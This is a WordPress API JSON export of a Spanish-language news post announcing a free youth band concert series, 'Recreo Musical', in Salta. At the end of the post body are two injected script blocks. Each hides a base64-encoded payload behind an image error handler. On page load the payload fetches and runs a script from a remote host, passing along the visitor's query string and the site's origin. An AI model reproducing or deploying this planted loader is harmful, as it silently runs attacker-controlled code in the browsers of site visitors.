{"id":4420,"date":"2024-09-19T11:31:09","date_gmt":"2024-09-19T14:31:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4420"},"modified":"2025-08-13T23:48:31","modified_gmt":"2025-08-14T02:48:31","slug":"inicia-recreo-musical-con-bandas-juveniles-en-el-anfiteatro-de-la-usina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4420","title":{"rendered":"Inicia Recreo Musical con bandas juveniles en el Anfiteatro de la Usina"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5d566d9c5dbee95cfb37891a64d600ad\" style=\"background-color:#054e78\"><em>Este jueves 19 de septiembre a las 20 horas, Espa\u00f1a 1-98 ser\u00e1 el escenario de la primera fecha del ciclo organizado por la Usina Cultural y la Secretar\u00eda de Cultura. La entrada ser\u00e1 libre y gratuita.<\/em><\/h4>\n\n\n\n<p>Recreo Musical inicia y para su primera fecha contar\u00e1 con la presentaci\u00f3n de tres bandas juveniles emergentes. Entre ellas, Luvalim\u00f3n, un proyecto liderado por Valentina Sola que inici\u00f3 en 2020 con presentaciones en solitario. M\u00e1s tarde incorpor\u00f3 m\u00fasicos adolescentes para darle mayor dimensi\u00f3n a su sonido, logrando fusionar influencias de blues, indie, folk y pop. Su \u00faltimo \u00e1lbum, \u00abCree(ser)\u00bb, explora temas de crecimiento, amor y claroscuros. Algunos de sus temas m\u00e1s conocidos son \u00abMedusas\u00bb, \u00abdepto\u00bb, \u00abConversaciones a puertas cerradas\u00bb, \u00abMundo Exterior\u00bb y \u00ab150\u00bb.<\/p>\n\n\n\n<p>Tambi\u00e9n se presentar\u00e1 Quimera, formada en 2023 por integrantes y ex integrantes de la Orquesta Sinf\u00f3nica Infantil y Juvenil de la provincia. Su m\u00fasica, marcada por influencias de grandes del rock como Cerati, Fito P\u00e1ez y Charly Garc\u00eda, promete ser uno de los platos fuertes de la noche.<\/p>\n\n\n\n<p>Finalmente, esta primera presentaci\u00f3n de Recreo Musical presentar\u00e1 a la banda Sekka, un grupo de cinco amigos que surgi\u00f3 como parte de un trabajo pr\u00e1ctico escolar. Con el apoyo de familiares vinculados a la m\u00fasica, han logrado avanzar en su pasi\u00f3n y tienen la oportunidad de compartir su estilo en este ciclo.<\/p>\n\n\n\n<p>Recreo Musical promete ser un espacio de encuentro para el talento joven y una plataforma para nuevas propuestas musicales con entrada libre y gratuita a partir de las 20h.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/inicia-recreo-musical-con-bandas-juveniles-en-el-anfiteatro-de-la-usina-97808\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este jueves 19 de septiembre a las 20 horas, Espa\u00f1a 1-98 ser\u00e1 el escenario de la primera fecha del ciclo organizado por la Usina Cultural y la Secretar\u00eda de Cultura. La entrada ser\u00e1 libre y gratuita. Recreo Musical inicia y para su primera fecha contar\u00e1 con la presentaci\u00f3n de tres bandas juveniles emergentes. Entre ellas, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4421,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,13],"tags":[],"class_list":{"0":"post-4420","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4420"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4420"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4420\/revisions"}],"predecessor-version":[{"id":6680,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4420\/revisions\/6680"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4421"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4420"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4420"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4420"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}